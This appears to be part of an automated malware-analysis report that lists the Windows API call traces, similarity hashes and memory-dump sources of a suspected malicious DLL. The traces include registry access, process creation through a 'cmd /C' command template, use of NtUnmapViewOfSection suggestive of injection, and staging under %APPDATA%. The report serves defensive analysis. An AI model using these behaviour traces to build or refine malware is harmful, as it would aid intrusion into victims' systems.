    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
